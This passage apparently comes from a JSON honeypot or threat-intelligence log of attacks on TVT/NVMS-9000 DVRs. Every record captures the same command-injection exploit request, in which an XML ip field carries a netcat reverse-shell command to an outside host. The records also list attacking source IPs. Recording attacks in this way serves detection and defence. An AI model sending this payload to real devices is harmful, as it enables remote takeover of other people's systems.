- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T07:33:20Z",
- "last_seen": "2019-12-23T07:33:20Z"
- },
- {
- "source_ip_address": "122.116.240.165",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T07:05:00Z",
- "last_seen": "2019-12-23T07:05:00Z"
- },
- {
- "source_ip_address": "219.76.181.82",
- "country": "HK",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T06:59:41Z",
- "last_seen": "2019-12-23T06:59:41Z"
- },
- {
- "source_ip_address": "182.191.76.252",
- "country": "PK",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 9,
- "first_seen": "2019-12-23T06:47:54Z",
- "last_seen": "2019-12-23T06:47:54Z"
- },
- {
- "source_ip_address": "122.117.120.250",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T06:43:42Z",
- "last_seen": "2019-12-23T06:43:42Z"
- },
- {
- "source_ip_address": "186.251.47.200",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 17,
- "first_seen": "2019-12-23T06:43:11Z",
- "last_seen": "2019-12-23T06:43:11Z"
- },
- {
- "source_ip_address": "189.226.84.206",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 38,
- "first_seen": "2019-12-23T06:40:54Z",
- "last_seen": "2019-12-23T06:40:54Z"
- },
- {
- "source_ip_address": "109.110.139.58",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 38,
- "first_seen": "2019-12-23T06:38:03Z",
- "last_seen": "2019-12-23T06:38:03Z"
- },
- {
- "source_ip_address": "5.2.143.125",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T06:26:28Z",
- "last_seen": "2019-12-23T06:26:28Z"
- },
- {
- "source_ip_address": "50.199.180.57",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T05:52:42Z",
- "last_seen": "2019-12-23T05:52:42Z"
- },
- {
- "source_ip_address": "189.223.231.146",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T05:19:10Z",
- "last_seen": "2019-12-23T05:19:10Z"
- },
- {
- "source_ip_address": "86.158.95.28",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T05:02:48Z",
- "last_seen": "2019-12-23T05:02:48Z"
- },
- {
- "source_ip_address": "96.76.66.161",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T04:55:15Z",
- "last_seen": "2019-12-23T04:55:15Z"
- },
- {
- "source_ip_address": "73.143.106.124",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 11,
- "first_seen": "2019-12-23T04:36:28Z",
- "last_seen": "2019-12-23T04:36:28Z"
- },
- {
- "source_ip_address": "60.48.39.96",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T04:29:11Z",
- "last_seen": "2019-12-23T04:29:11Z"
- },
- {
- "source_ip_address": "175.143.148.98",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T04:29:04Z",
- "last_seen": "2019-12-23T04:29:04Z"
- },
- {
- "source_ip_address": "5.66.202.101",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T03:48:55Z",
- "last_seen": "2019-12-23T03:48:55Z"
- },
- {
- "source_ip_address": "50.233.0.68",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 17,
- "first_seen": "2019-12-18T22:58:28Z",
- "last_seen": "2019-12-23T03:17:13Z"
- },
- {
- "source_ip_address": "114.33.24.233",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 19,
- "first_seen": "2019-12-23T03:15:53Z",
- "last_seen": "2019-12-23T03:15:53Z"
- },
- {
- "source_ip_address": "182.19.218.218",
- "country": "SG",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 21,
- "first_seen": "2019-12-23T02:58:43Z",
- "last_seen": "2019-12-23T02:58:43Z"
- },
- {
- "source_ip_address": "89.35.193.128",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T02:46:54Z",
- "last_seen": "2019-12-23T02:46:54Z"
- },
- {
- "source_ip_address": "93.42.255.250",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T02:30:09Z",
- "last_seen": "2019-12-23T02:30:09Z"
- },
- {
- "source_ip_address": "60.250.29.57",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-23T02:01:37Z",
- "last_seen": "2019-12-23T02:01:37Z"
- },
- {
- "source_ip_address": "118.70.105.84",
- "country": "VN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T01:42:30Z",
- "last_seen": "2019-12-23T01:42:30Z"
- },
- {
- "source_ip_address": "98.197.26.90",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T01:34:36Z",
- "last_seen": "2019-12-23T01:34:36Z"
- },
- {
- "source_ip_address": "59.126.111.191",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T00:59:48Z",
- "last_seen": "2019-12-23T00:59:48Z"
- },
- {
- "source_ip_address": "185.27.62.141",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T20:30:39Z",
- "last_seen": "2019-12-23T00:32:11Z"
- },
- {
- "source_ip_address": "109.100.190.15",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
